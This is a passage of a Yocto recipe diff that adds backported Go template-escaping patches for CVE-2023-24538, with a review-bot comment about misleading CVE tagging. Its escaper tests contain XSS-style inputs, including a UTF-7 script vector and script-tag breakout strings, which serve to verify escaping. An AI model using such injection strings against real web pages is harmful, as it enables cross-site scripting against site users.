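+- `greeting=H%69,\x26addressee=(World)`,
+- `greeting=H%69,\x26addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
++ `Hello, World \u0026 O\u0027Reilly\u0021`,
++ `greeting=H%69,\u0026addressee=(World)`,
++ `greeting=H%69,\u0026addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
+ `,foo\/,`,
+ },
+ },
+@@ -253,7 +253,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello%2c%20%3cb%3eWorld%3c%2fb%3e%20%26amp%3btc%21`,
+ `%20dir%3d%22ltr%22`,
+ `c%20%26%26%20alert%28%22Hello%2c%20World%21%22%29%3b`,
+- `Hello%2c%20World%20%26%20O%27Reilly%5cx21`,
++ `Hello%2c%20World%20%26%20O%27Reilly%5cu0021`,
+ // Quotes and parens are escaped but %69 is not over-escaped. HTML escaping is done.
+ `greeting=H%69,&amp;addressee=%28World%29`,
+ `greeting%3dH%2569%2c%26addressee%3d%28World%29%202x%2c%20https%3a%2f%2fgolang.org%2ffavicon.ico%20500.5w`,
+@@ -268,7 +268,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello%2c%20%3cb%3eWorld%3c%2fb%3e%20%26amp%3btc%21`,
+ `%20dir%3d%22ltr%22`,
+ `c%20%26%26%20alert%28%22Hello%2c%20World%21%22%29%3b`,
+- `Hello%2c%20World%20%26%20O%27Reilly%5cx21`,
++ `Hello%2c%20World%20%26%20O%27Reilly%5cu0021`,
+ // Quotes and parens are escaped but %69 is not over-escaped. HTML escaping is not done.
+ `greeting=H%69,&addressee=%28World%29`,
+ `greeting%3dH%2569%2c%26addressee%3d%28World%29%202x%2c%20https%3a%2f%2fgolang.org%2ffavicon.ico%20500.5w`,
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index e72a9ba..c709660 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -238,7 +238,7 @@ func TestEscape(t *testing.T) {
+ {
+ "jsStr",
+ "<button onclick='alert(&quot;{{.H}}&quot;)'>",
+- `<button onclick='alert(&quot;\x3cHello\x3e&quot;)'>`,
++ `<button onclick='alert(&quot;\u003cHello\u003e&quot;)'>`,
+ },
+ {
+ "badMarshaler",
+@@ -259,7 +259,7 @@ func TestEscape(t *testing.T) {
+ {
+ "jsRe",
+ `<button onclick='alert(/{{"foo+bar"}}/.test(""))'>`,
+- `<button onclick='alert(/foo\x2bbar/.test(""))'>`,
++ `<button onclick='alert(/foo\u002bbar/.test(""))'>`,
+ },
+ {
+ "jsReBlank",
+@@ -825,7 +825,7 @@ func TestEscapeSet(t *testing.T) {
+ "main": `<button onclick="title='{{template "helper"}}'; ...">{{template "helper"}}</button>`,
+ "helper": `{{11}} of {{"<100>"}}`,
+ },
+- `<button onclick="title='11 of \x3c100\x3e'; ...">11 of &lt;100&gt;</button>`,
++ `<button onclick="title='11 of \u003c100\u003e'; ...">11 of &lt;100&gt;</button>`,
+ },
+ // A non-recursive template that ends in a different context.
+ // helper starts in jsCtxRegexp and ends in jsCtxDivOp.
+diff --git a/src/html/template/example_test.go b/src/html/template/example_test.go
+index 9d965f1..6cf936f 100644
+--- a/src/html/template/example_test.go
++++ b/src/html/template/example_test.go
+@@ -116,9 +116,9 @@ func Example_escape() {
+ // &#34;Fran &amp; Freddie&#39;s Diner&#34; &lt;tasty@example.com&gt;
+ // &#34;Fran &amp; Freddie&#39;s Diner&#34; &lt;tasty@example.com&gt;
+ // &#34;Fran &amp; Freddie&#39;s Diner&#34;32&lt;tasty@example.com&gt;
+- // \"Fran \x26 Freddie\'s Diner\" \x3Ctasty@example.com\x3E
+- // \"Fran \x26 Freddie\'s Diner\" \x3Ctasty@example.com\x3E
+- // \"Fran \x26 Freddie\'s Diner\"32\x3Ctasty@example.com\x3E
++ // \"Fran \u0026 Freddie\'s Diner\" \u003Ctasty@example.com\u003E
++ // \"Fran \u0026 Freddie\'s Diner\" \u003Ctasty@example.com\u003E
++ // \"Fran \u0026 Freddie\'s Diner\"32\u003Ctasty@example.com\u003E
+ // %22Fran+%26+Freddie%27s+Diner%2232%3Ctasty%40example.com%3E
+
+ }
+diff --git a/src/html/template/js.go b/src/html/template/js.go
+index 0e91458..ea9c183 100644
+--- a/src/html/template/js.go
++++ b/src/html/template/js.go
+@@ -163,7 +163,6 @@ func jsValEscaper(args ...interface{}) string {
+ }
+ // TODO: detect cycles before calling Marshal which loops infinitely on
+ // cyclic data. This may be an unacceptable DoS risk.
+-
+ b, err := json.Marshal(a)
+ if err != nil {
+ // Put a space before comment so that if it is flush against
+@@ -178,8 +177,8 @@ func jsValEscaper(args ...interface{}) string {
+ // TODO: maybe post-process output to prevent it from containing
+ // "<!--", "-->", "<![CDATA[", "]]>", or "</script"
+ // in case custom marshalers produce output containing those.
+-
+- // TODO: Maybe abbreviate \u00ab to \xab to produce more compact output.
++ // Note: Do not use \x escaping to save bytes because it is not JSON compatible and this escaper
++ // supports ld+json content-type.
+ if len(b) == 0 {
+ // In, `x=y/{{.}}*z` a json.Marshaler that produces "" should
+ // not cause the output `x=y/*z`.
+@@ -260,6 +259,8 @@ func replace(s string, replacementTable []string) string {
+ r, w = utf8.DecodeRuneInString(s[i:])
+ var repl string
+ switch {
++ case int(r) < len(lowUnicodeReplacementTable):
++ repl = lowUnicodeReplacementTable[r]
+ case int(r) < len(replacementTable) && replacementTable[r] != "":
+ repl = replacementTable[r]
+ case r == '\u2028':
+@@ -283,67 +284,80 @@ func replace(s string, replacementTable []string) string {
+ return b.String()
+ }
+
++var lowUnicodeReplacementTable = []string{
++ 0: `\u0000`, 1: `\u0001`, 2: `\u0002`, 3: `\u0003`, 4: `\u0004`, 5: `\u0005`, 6: `\u0006`,
++ '\a': `\u0007`,
++ '\b': `\u0008`,
++ '\t': `\t`,
++ '\n': `\n`,
++ '\v': `\u000b`, // "\v" == "v" on IE 6.
++ '\f': `\f`,
++ '\r': `\r`,
++ 0xe: `\u000e`, 0xf: `\u000f`, 0x10: `\u0010`, 0x11: `\u0011`, 0x12: `\u0012`, 0x13: `\u0013`,
++ 0x14: `\u0014`, 0x15: `\u0015`, 0x16: `\u0016`, 0x17: `\u0017`, 0x18: `\u0018`, 0x19: `\u0019`,
++ 0x1a: `\u001a`, 0x1b: `\u001b`, 0x1c: `\u001c`, 0x1d: `\u001d`, 0x1e: `\u001e`, 0x1f: `\u001f`,
++}
++
+ var jsStrReplacementTable = []string{
+- 0: `\0`,
++ 0: `\u0000`,
+ '\t': `\t`,
+ '\n': `\n`,
+- '\v': `\x0b`, // "\v" == "v" on IE 6.
++ '\v': `\u000b`, // "\v" == "v" on IE 6.
+ '\f': `\f`,
+ '\r': `\r`,
+ // Encode HTML specials as hex so the output can be embedded
+ // in HTML attributes without further encoding.
+- '"': `\x22`,
+- '&': `\x26`,
+- '\'': `\x27`,
+- '+': `\x2b`,
++ '"': `\u0022`,
++ '&': `\u0026`,
++ '\'': `\u0027`,
++ '+': `\u002b`,
+ '/': `\/`,
+- '<': `\x3c`,
+- '>': `\x3e`,
++ '<': `\u003c`,
++ '>': `\u003e`,
+ '\\': `\\`,
+ }
+
+ // jsStrNormReplacementTable is like jsStrReplacementTable but does not
+ // overencode existing escapes since this table has no entry for `\`.
+ var jsStrNormReplacementTable = []string{
+- 0: `\0`,
++ 0: `\u0000`,
+ '\t': `\t`,
+ '\n': `\n`,
+- '\v': `\x0b`, // "\v" == "v" on IE 6.
++ '\v': `\u000b`, // "\v" == "v" on IE 6.
+ '\f': `\f`,
+ '\r': `\r`,
+ // Encode HTML specials as hex so the output can be embedded
+ // in HTML attributes without further encoding.
+- '"': `\x22`,
+- '&': `\x26`,
+- '\'': `\x27`,
+- '+': `\x2b`,
++ '"': `\u0022`,
++ '&': `\u0026`,
++ '\'': `\u0027`,
++ '+': `\u002b`,
+ '/': `\/`,
+- '<': `\x3c`,
+- '>': `\x3e`,
++ '<': `\u003c`,
++ '>': `\u003e`,
+ }
+-
+ var jsRegexpReplacementTable = []string{
+- 0: `\0`,
++ 0: `\u0000`,
+ '\t': `\t`,
+ '\n': `\n`,
+- '\v': `\x0b`, // "\v" == "v" on IE 6.
++ '\v': `\u000b`, // "\v" == "v" on IE 6.
+ '\f': `\f`,
+ '\r': `\r`,
+ // Encode HTML specials as hex so the output can be embedded
+ // in HTML attributes without further encoding.
+- '"': `\x22`,
++ '"': `\u0022`,
+ '$': `\$`,
+- '&': `\x26`,
+- '\'': `\x27`,
++ '&': `\u0026`,
++ '\'': `\u0027`,
+ '(': `\(`,
+ ')': `\)`,
+ '*': `\*`,
+- '+': `\x2b`,
++ '+': `\u002b`,
+ '-': `\-`,
+ '.': `\.`,
+ '/': `\/`,
+- '<': `\x3c`,
+- '>': `\x3e`,
++ '<': `\u003c`,
++ '>': `\u003e`,
+ '?': `\?`,
+ '[': `\[`,
+ '\\': `\\`,
+diff --git a/src/html/template/js_test.go b/src/html/template/js_test.go
+index 075adaa..d7ee47b 100644
+--- a/src/html/template/js_test.go
++++ b/src/html/template/js_test.go
+@@ -137,7 +137,7 @@ func TestJSValEscaper(t *testing.T) {
+ {"foo", `"foo"`},
+ // Newlines.
+ {"\r\n\u2028\u2029", `"\r\n\u2028\u2029"`},
+- // "\v" == "v" on IE 6 so use "\x0b" instead.
++ // "\v" == "v" on IE 6 so use "\u000b" instead.
+ {"\t\x0b", `"\t\u000b"`},
+ {struct{ X, Y int }{1, 2}, `{"X":1,"Y":2}`},
+ {[]interface{}{}, "[]"},
+@@ -173,7 +173,7 @@ func TestJSStrEscaper(t *testing.T) {
+ }{
+ {"", ``},
+ {"foo", `foo`},
+- {"\u0000", `\0`},
++ {"\u0000", `\u0000`},
+ {"\t", `\t`},
+ {"\n", `\n`},
+ {"\r", `\r`},
+@@ -183,14 +183,14 @@ func TestJSStrEscaper(t *testing.T) {
+ {"\\n", `\\n`},
+ {"foo\r\nbar", `foo\r\nbar`},
+ // Preserve attribute boundaries.
+- {`"`, `\x22`},
+- {`'`, `\x27`},
++ {`"`, `\u0022`},
++ {`'`, `\u0027`},
+ // Allow embedding in HTML without further escaping.
+- {`&amp;`, `\x26amp;`},
++ {`&amp;`, `\u0026amp;`},
+ // Prevent breaking out of text node and element boundaries.
+- {"</script>", `\x3c\/script\x3e`},
+- {"<![CDATA[", `\x3c![CDATA[`},
+- {"]]>", `]]\x3e`},
++ {"</script>", `\u003c\/script\u003e`},
++ {"<![CDATA[", `\u003c![CDATA[`},
++ {"]]>", `]]\u003e`},
+ // https://dev.w3.org/html5/markup/aria/syntax.html#escaping-text-span
+ // "The text in style, script, title, and textarea elements
+ // must not have an escaping text span start that is not
+@@ -201,11 +201,11 @@ func TestJSStrEscaper(t *testing.T) {
+ // allow regular text content to be interpreted as script
+ // allowing script execution via a combination of a JS string
+ // injection followed by an HTML text injection.
+- {"<!--", `\x3c!--`},
+- {"-->", `--\x3e`},
++ {"<!--", `\u003c!--`},
++ {"-->", `--\u003e`},
+ // From https://code.google.com/p/doctype/wiki/ArticleUtf7
+ {"+ADw-script+AD4-alert(1)+ADw-/script+AD4-",
+- `\x2bADw-script\x2bAD4-alert(1)\x2bADw-\/script\x2bAD4-`,
++ `\u002bADw-script\u002bAD4-alert(1)\u002bADw-\/script\u002bAD4-`,
+ },
+ // Invalid UTF-8 sequence
+ {"foo\xA0bar", "foo\xA0bar"},
+@@ -228,7 +228,7 @@ func TestJSRegexpEscaper(t *testing.T) {
+ }{
+ {"", `(?:)`},
+ {"foo", `foo`},
+- {"\u0000", `\0`},
++ {"\u0000", `\u0000`},
+ {"\t", `\t`},
+ {"\n", `\n`},
+ {"\r", `\r`},
+@@ -238,19 +238,19 @@ func TestJSRegexpEscaper(t *testing.T) {
+ {"\\n", `\\n`},
+ {"foo\r\nbar", `foo\r\nbar`},
+ // Preserve attribute boundaries.
+- {`"`, `\x22`},
+- {`'`, `\x27`},
++ {`"`, `\u0022`},
++ {`'`, `\u0027`},
+ // Allow embedding in HTML without further escaping.
+- {`&amp;`, `\x26amp;`},
++ {`&amp;`, `\u0026amp;`},
+ // Prevent breaking out of text node and element boundaries.
+- {"</script>", `\x3c\/script\x3e`},
+- {"<![CDATA[", `\x3c!\[CDATA\[`},
+- {"]]>", `\]\]\x3e`},
++ {"</script>", `\u003c\/script\u003e`},
++ {"<![CDATA[", `\u003c!\[CDATA\[`},
++ {"]]>", `\]\]\u003e`},
+ // Escaping text spans.
+- {"<!--", `\x3c!\-\-`},
+- {"-->", `\-\-\x3e`},
++ {"<!--", `\u003c!\-\-`},
++ {"-->", `\-\-\u003e`},
+ {"*", `\*`},
+- {"+", `\x2b`},
++ {"+", `\u002b`},
+ {"?", `\?`},
+ {"[](){}", `\[\]\(\)\{\}`},
+ {"$foo|x.y", `\$foo\|x\.y`},
+@@ -284,27 +284,27 @@ func TestEscapersOnLower7AndSelectHighCodepoints(t *testing.T) {
+ {
+ "jsStrEscaper",
+ jsStrEscaper,
+- "\\0\x01\x02\x03\x04\x05\x06\x07" +
+- "\x08\\t\\n\\x0b\\f\\r\x0E\x0F" +
+- "\x10\x11\x12\x13\x14\x15\x16\x17" +
+- "\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" +
+- ` !\x22#$%\x26\x27()*\x2b,-.\/` +
+- `0123456789:;\x3c=\x3e?` +
++ `\u0000\u0001\u0002\u0003\u0004\u0005\u0006\u0007` +
++ `\u0008\t\n\u000b\f\r\u000e\u000f` +
++ `\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017` +
++ `\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f` +
++ ` !\u0022#$%\u0026\u0027()*\u002b,-.\/` +
++ `0123456789:;\u003c=\u003e?` +
+ `@ABCDEFGHIJKLMNO` +
+ `PQRSTUVWXYZ[\\]^_` +
+ "`abcdefghijklmno" +
+- "pqrstuvwxyz{|}~\x7f" +
++ "pqrstuvwxyz{|}~\u007f" +
+ "\u00A0\u0100\\u2028\\u2029\ufeff\U0001D11E",
+ },
+ {
+ "jsRegexpEscaper",
+ jsRegexpEscaper,
+- "\\0\x01\x02\x03\x04\x05\x06\x07" +
+- "\x08\\t\\n\\x0b\\f\\r\x0E\x0F" +
+- "\x10\x11\x12\x13\x14\x15\x16\x17" +
+- "\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" +
+- ` !\x22#\$%\x26\x27\(\)\*\x2b,\-\.\/` +
+- `0123456789:;\x3c=\x3e\?` +
++ `\u0000\u0001\u0002\u0003\u0004\u0005\u0006\u0007` +
++ `\u0008\t\n\u000b\f\r\u000e\u000f` +
++ `\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017` +
++ `\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f` +
++ ` !\u0022#\$%\u0026\u0027\(\)\*\u002b,\-\.\/` +
++ `0123456789:;\u003c=\u003e\?` +
+ `@ABCDEFGHIJKLMNO` +
+ `PQRSTUVWXYZ\[\\\]\^_` +
+ "`abcdefghijklmno" +
+diff --git a/src/html/template/template_test.go b/src/html/template/template_test.go
+index 13e6ba4..86bd4db 100644
+--- a/src/html/template/template_test.go
++++ b/src/html/template/template_test.go
+@@ -6,6 +6,7 @@ package template_test
+
+ import (
+ "bytes"
++ "encoding/json"
+ . "html/template"
+ "strings"
+ "testing"
+@@ -121,6 +122,44 @@ func TestNumbers(t *testing.T) {
+ c.mustExecute(c.root, nil, "12.34 7.5")
+ }
+
++func TestStringsInScriptsWithJsonContentTypeAreCorrectlyEscaped(t *testing.T) {
++ // See #33671 and #37634 for more context on this.
++ tests := []struct{ name, in string }{
++ {"empty", ""},
++ {"invalid", string(rune(-1))},
++ {"null", "\u0000"},
++ {"unit separator", "\u001F"},
++ {"tab", "\t"},
++ {"gt and lt", "<>"},
++ {"quotes", `'"`},
++ {"ASCII letters", "ASCII letters"},
++ {"Unicode", "ʕ⊙ϖ⊙ʔ"},
++ {"Pizza", "P"},
++ }
++ const (
++ prefix = `<script type="application/ld+json">`
++ suffix = `</script>`
++ templ = prefix + `"{{.}}"` + suffix
++ )
++ tpl := Must(New("JS string is JSON string").Parse(templ))
++ for _, tt := range tests {
++ t.Run(tt.name, func(t *testing.T) {
++ var buf bytes.Buffer
++ if err := tpl.Execute(&buf, tt.in); err != nil {
++ t.Fatalf("Cannot render template: %v", err)
++ }
++ trimmed := bytes.TrimSuffix(bytes.TrimPrefix(buf.Bytes(), []byte(prefix)), []byte(suffix))
++ var got string
++ if err := json.Unmarshal(trimmed, &got); err != nil {
++ t.Fatalf("Cannot parse JS string %q as JSON: %v", trimmed[1:len(trimmed)-1], err)
++ }
++ if got != tt.in {
++ t.Errorf("Serialization changed the string value: got %q want %q", got, tt.in)
++ }
++ })
++ }
++}
++
+ type testCase struct {
+ t *testing.T
+ root *Template
+diff --git a/src/text/template/exec_test.go b/src/text/template/exec_test.go
+index 77294ed..b8a809e 100644
+--- a/src/text/template/exec_test.go
++++ b/src/text/template/exec_test.go
+@@ -911,9 +911,9 @@ func TestJSEscaping(t *testing.T) {
+ {`Go "jump" \`, `Go \"jump\" \\`},
+ {`Yukihiro says "今日は世界"`, `Yukihiro says \"今日は世界\"`},
+ {"unprintable \uFDFF", `unprintable \uFDFF`},
+- {`<html>`, `\x3Chtml\x3E`},
+- {`no = in attributes`, `no \x3D in attributes`},
+- {`&#x27; does not become HTML entity`, `\x26#x27; does not become HTML entity`},
++ {`<html>`, `\u003Chtml\u003E`},
++ {`no = in attributes`, `no \u003D in attributes`},
++ {`&#x27; does not become HTML entity`, `\u0026#x27; does not become HTML entity`},
+ }
+ for _, tc := range testCases {
+ s := JSEscapeString(tc.in)
+diff --git a/src/text/template/funcs.go b/src/text/template/funcs.go
+index 46125bc..f3de9fb 100644
+--- a/src/text/template/funcs.go
++++ b/src/text/template/funcs.go
+@@ -640,10 +640,10 @@ var (
+ jsBackslash = []byte(`\\`)
+ jsApos = []byte(`\'`)
+ jsQuot = []byte(`\"`)
+- jsLt = []byte(`\x3C`)
+- jsGt = []byte(`\x3E`)
+- jsAmp = []byte(`\x26`)
+- jsEq = []byte(`\x3D`)
++ jsLt = []byte(`\u003C`)
++ jsGt = []byte(`\u003E`)
++ jsAmp = []byte(`\u0026`)
++ jsEq = []byte(`\u003D`)
+ )
+
+ // JSEscape writes to w the escaped JavaScript equivalent of the plain text data b.
+--
+2.7.4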
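Review bot: The header of this new patch file tags it `CVE: CVE-2023-24538` and calls it "Dependency Patch #2", but nowhere says that it is only a prerequisite and not the fix itself; what it changes is the escape format of the JS escapers, from `\x3c`-style to `\u003c`-style. Tooling that derives patch status from the `CVE:` tag or the file name would, as far as I know, report the CVE as handled once any single file of the series is applied, so I would add a line under `Dependency Patch #2` such as `Prerequisite only: does not fix CVE-2023-24538 unless the whole series is applied.` Since the rendered output of `html/template` and `text/template` changes on a stable branch, the same header deserves one sentence for anyone who compares escaped output byte for byte. Separately, this file is named `CVE-2023-24538-2.patch` while the next one is `CVE-2023-24538_3.patch`; a single separator would keep the series easy to list and audit.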
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_3.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_3.patch
new file mode 100644
index 0000000000..cd7dd0957c
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_3.patch
@@ -0,0 +1,393 @@
1From 7ddce23c7d5b728acf8482f5006497c7b9915f8a Mon Sep 17 00:00:00 2001
2From: Ariel Mashraki <ariel@mashraki.co.il>
3Date: Wed, 22 Apr 2020 22:17:56 +0300
4Subject: [PATCH 3/6] text/template: add CommentNode to template parse tree
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9Fixes #34652
10
11Change-Id: Icf6e3eda593fed826736f34f95a9d66f5450cc98
12Reviewed-on: https://go-review.googlesource.com/c/go/+/229398
13Reviewed-by: Daniel Martí <mvdan@mvdan.cc>
14Run-TryBot: Daniel Martí <mvdan@mvdan.cc>
15TryBot-Result: Gobot Gobot <gobot@golang.org>
16
17Dependency Patch #3
18
19Upstream-Status: Backport from https://github.com/golang/go/commit/c8ea03828b0645b1fd5725888e44873b75fcfbb6
20CVE: CVE-2023-24538
21Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
22---
23 api/next.txt | 19 +++++++++++++++++++
24 src/html/template/escape.go | 2 ++
25 src/html/template/template_test.go | 16 ++++++++++++++++
26 src/text/template/exec.go | 1 +
27 src/text/template/parse/lex.go | 8 +++++++-
28 src/text/template/parse/lex_test.go | 7 +++++--
29 src/text/template/parse/node.go | 33 +++++++++++++++++++++++++++++++++
30 src/text/template/parse/parse.go | 22 +++++++++++++++++++---
31 src/text/template/parse/parse_test.go | 25 +++++++++++++++++++++++++
32 9 files changed, 127 insertions(+), 6 deletions(-)
33
34diff --git a/api/next.txt b/api/next.txt
35index e69de29..076f39e 100644
36--- a/api/next.txt
37+++ b/api/next.txt
38@@ -0,0 +1,19 @@
39+pkg unicode, const Version = "13.0.0"
40+pkg unicode, var Chorasmian *RangeTable
41+pkg unicode, var Dives_Akuru *RangeTable
42+pkg unicode, var Khitan_Small_Script *RangeTable
43+pkg unicode, var Yezidi *RangeTable
44+pkg text/template/parse, const NodeComment = 20
45+pkg text/template/parse, const NodeComment NodeType
46+pkg text/template/parse, const ParseComments = 1
47+pkg text/template/parse, const ParseComments Mode
48+pkg text/template/parse, method (*CommentNode) Copy() Node
49+pkg text/template/parse, method (*CommentNode) String() string
50+pkg text/template/parse, method (CommentNode) Position() Pos
51+pkg text/template/parse, method (CommentNode) Type() NodeType
52+pkg text/template/parse, type CommentNode struct
53+pkg text/template/parse, type CommentNode struct, Text string
54+pkg text/template/parse, type CommentNode struct, embedded NodeType
55+pkg text/template/parse, type CommentNode struct, embedded Pos
56+pkg text/template/parse, type Mode uint
57+pkg text/template/parse, type Tree struct, Mode Mode
58diff --git a/src/html/template/escape.go b/src/html/template/escape.go
59index f12dafa..8739735 100644
60--- a/src/html/template/escape.go
61+++ b/src/html/template/escape.go
62@@ -124,6 +124,8 @@ func (e *escaper) escape(c context, n parse.Node) context {
63 switch n := n.(type) {
64 case *parse.ActionNode:
65 return e.escapeAction(c, n)
66+ case *parse.CommentNode:
67+ return c
68 case *parse.IfNode:
69 return e.escapeBranch(c, &n.BranchNode, "if")
70 case *parse.ListNode:
71diff --git a/src/html/template/template_test.go b/src/html/template/template_test.go
72index 86bd4db..1f2c888 100644
73--- a/src/html/template/template_test.go
74+++ b/src/html/template/template_test.go
75@@ -10,6 +10,7 @@ import (
76 . "html/template"
77 "strings"
78 "testing"
79+ "text/template/parse"
80 )
81
82 func TestTemplateClone(t *testing.T) {
83@@ -160,6 +161,21 @@ func TestStringsInScriptsWithJsonContentTypeAreCorrectlyEscaped(t *testing.T) {
84 }
85 }
86
87+func TestSkipEscapeComments(t *testing.T) {
88+ c := newTestCase(t)
89+ tr := parse.New("root")
90+ tr.Mode = parse.ParseComments
91+ newT, err := tr.Parse("{{/* A comment */}}{{ 1 }}{{/* Another comment */}}", "", "", make(map[string]*parse.Tree))
92+ if err != nil {
93+ t.Fatalf("Cannot parse template text: %v", err)
94+ }
95+ c.root, err = c.root.AddParseTree("root", newT)
96+ if err != nil {
97+ t.Fatalf("Cannot add parse tree to template: %v", err)
98+ }
99+ c.mustExecute(c.root, nil, "1")
100+}
101+
102 type testCase struct {
103 t *testing.T
104 root *Template
105diff --git a/src/text/template/exec.go b/src/text/template/exec.go
106index ac3e741..7ac5175 100644
107--- a/src/text/template/exec.go
108+++ b/src/text/template/exec.go
109@@ -256,6 +256,7 @@ func (s *state) walk(dot reflect.Value, node parse.Node) {
110 if len(node.Pipe.Decl) == 0 {
111 s.printValue(node, val)
112 }
113+ case *parse.CommentNode:
114 case *parse.IfNode:
115 s.walkIfOrWith(parse.NodeIf, dot, node.Pipe, node.List, node.ElseList)
116 case *parse.ListNode:
117diff --git a/src/text/template/parse/lex.go b/src/text/template/parse/lex.go
118index 30371f2..e41373a 100644
119--- a/src/text/template/parse/lex.go
120+++ b/src/text/template/parse/lex.go
121@@ -41,6 +41,7 @@ const (
122 itemBool // boolean constant
123 itemChar // printable ASCII character; grab bag for comma etc.
124 itemCharConstant // character constant
125+ itemComment // comment text
126 itemComplex // complex constant (1+2i); imaginary is just a number
127 itemAssign // equals ('=') introducing an assignment
128 itemDeclare // colon-equals (':=') introducing a declaration
129@@ -112,6 +113,7 @@ type lexer struct {
130 leftDelim string // start of action
131 rightDelim string // end of action
132 trimRightDelim string // end of action with trim marker
133+ emitComment bool // emit itemComment tokens.
134 pos Pos // current position in the input
135 start Pos // start position of this item
136 width Pos // width of last rune read from input
137@@ -203,7 +205,7 @@ func (l *lexer) drain() {
138 }
139
140 // lex creates a new scanner for the input string.
141-func lex(name, input, left, right string) *lexer {
142+func lex(name, input, left, right string, emitComment bool) *lexer {
143 if left == "" {
144 left = leftDelim
145 }
146@@ -216,6 +218,7 @@ func lex(name, input, left, right string) *lexer {
147 leftDelim: left,
148 rightDelim: right,
149 trimRightDelim: rightTrimMarker + right,
150+ emitComment: emitComment,
151 items: make(chan item),
152 line: 1,
153 startLine: 1,
154@@ -323,6 +326,9 @@ func lexComment(l *lexer) stateFn {
155 if !delim {
156 return l.errorf("comment ends before closing delimiter")
157 }
158+ if l.emitComment {
159+ l.emit(itemComment)
160+ }
161 if trimSpace {
162 l.pos += trimMarkerLen
163 }
164diff --git a/src/text/template/parse/lex_test.go b/src/text/template/parse/lex_test.go
165index 563c4fc..f6d5f28 100644
166--- a/src/text/template/parse/lex_test.go
167+++ b/src/text/template/parse/lex_test.go
168@@ -15,6 +15,7 @@ var itemName = map[itemType]string{
169 itemBool: "bool",
170 itemChar: "char",
171 itemCharConstant: "charconst",
172+ itemComment: "comment",
173 itemComplex: "complex",
174 itemDeclare: ":=",
175 itemEOF: "EOF",
176@@ -90,6 +91,7 @@ var lexTests = []lexTest{
177 {"text", `now is the time`, []item{mkItem(itemText, "now is the time"), tEOF}},
178 {"text with comment", "hello-{{/* this is a comment */}}-world", []item{
179 mkItem(itemText, "hello-"),
180+ mkItem(itemComment, "/* this is a comment */"),
181 mkItem(itemText, "-world"),
182 tEOF,
183 }},
184@@ -311,6 +313,7 @@ var lexTests = []lexTest{
185 }},
186 {"trimming spaces before and after comment", "hello- {{- /* hello */ -}} -world", []item{
187 mkItem(itemText, "hello-"),
188+ mkItem(itemComment, "/* hello */"),
189 mkItem(itemText, "-world"),
190 tEOF,
191 }},
192@@ -389,7 +392,7 @@ var lexTests = []lexTest{
193
194 // collect gathers the emitted items into a slice.
195 func collect(t *lexTest, left, right string) (items []item) {
196- l := lex(t.name, t.input, left, right)
197+ l := lex(t.name, t.input, left, right, true)
198 for {
199 item := l.nextItem()
200 items = append(items, item)
201@@ -529,7 +532,7 @@ func TestPos(t *testing.T) {
202 func TestShutdown(t *testing.T) {
203 // We need to duplicate template.Parse here to hold on to the lexer.
204 const text = "erroneous{{define}}{{else}}1234"
205- lexer := lex("foo", text, "{{", "}}")
206+ lexer := lex("foo", text, "{{", "}}", false)
207 _, err := New("root").parseLexer(lexer)
208 if err == nil {
209 t.Fatalf("expected error")
210diff --git a/src/text/template/parse/node.go b/src/text/template/parse/node.go
211index 1c116ea..a9dad5e 100644
212--- a/src/text/template/parse/node.go
213+++ b/src/text/template/parse/node.go
214@@ -70,6 +70,7 @@ const (
215 NodeTemplate // A template invocation action.
216 NodeVariable // A $ variable.
217 NodeWith // A with action.
218+ NodeComment // A comment.
219 )
220
221 // Nodes.
222@@ -149,6 +150,38 @@ func (t *TextNode) Copy() Node {
223 return &TextNode{tr: t.tr, NodeType: NodeText, Pos: t.Pos, Text: append([]byte{}, t.Text...)}
224 }
225
226+// CommentNode holds a comment.
227+type CommentNode struct {
228+ NodeType
229+ Pos
230+ tr *Tree
231+ Text string // Comment text.
232+}
233+
234+func (t *Tree) newComment(pos Pos, text string) *CommentNode {
235+ return &CommentNode{tr: t, NodeType: NodeComment, Pos: pos, Text: text}
236+}
237+
238+func (c *CommentNode) String() string {
239+ var sb strings.Builder
240+ c.writeTo(&sb)
241+ return sb.String()
242+}
243+
244+func (c *CommentNode) writeTo(sb *strings.Builder) {
245+ sb.WriteString("{{")
246+ sb.WriteString(c.Text)
247+ sb.WriteString("}}")
248+}
249+
250+func (c *CommentNode) tree() *Tree {
251+ return c.tr
252+}
253+
254+func (c *CommentNode) Copy() Node {
255+ return &CommentNode{tr: c.tr, NodeType: NodeComment, Pos: c.Pos, Text: c.Text}
256+}
257+
258 // PipeNode holds a pipeline with optional declaration
259 type PipeNode struct {
260 NodeType
261diff --git a/src/text/template/parse/parse.go b/src/text/template/parse/parse.go
262index c9b80f4..496d8bf 100644
263--- a/src/text/template/parse/parse.go
264+++ b/src/text/template/parse/parse.go
265@@ -21,6 +21,7 @@ type Tree struct {
266 Name string // name of the template represented by the tree.
267 ParseName string // name of the top-level template during parsing, for error messages.
268 Root *ListNode // top-level root of the tree.
269+ Mode Mode // parsing mode.
270 text string // text parsed to create the template (or its parent)
271 // Parsing only; cleared after parse.
272 funcs []map[string]interface{}
273@@ -29,8 +30,16 @@ type Tree struct {
274 peekCount int
275 vars []string // variables defined at the moment.
276 treeSet map[string]*Tree
277+ mode Mode
278 }
279
280+// A mode value is a set of flags (or 0). Modes control parser behavior.
281+type Mode uint
282+
283+const (
284+ ParseComments Mode = 1 << iota // parse comments and add them to AST
285+)
286+
287 // Copy returns a copy of the Tree. Any parsing state is discarded.
288 func (t *Tree) Copy() *Tree {
289 if t == nil {
290@@ -220,7 +229,8 @@ func (t *Tree) stopParse() {
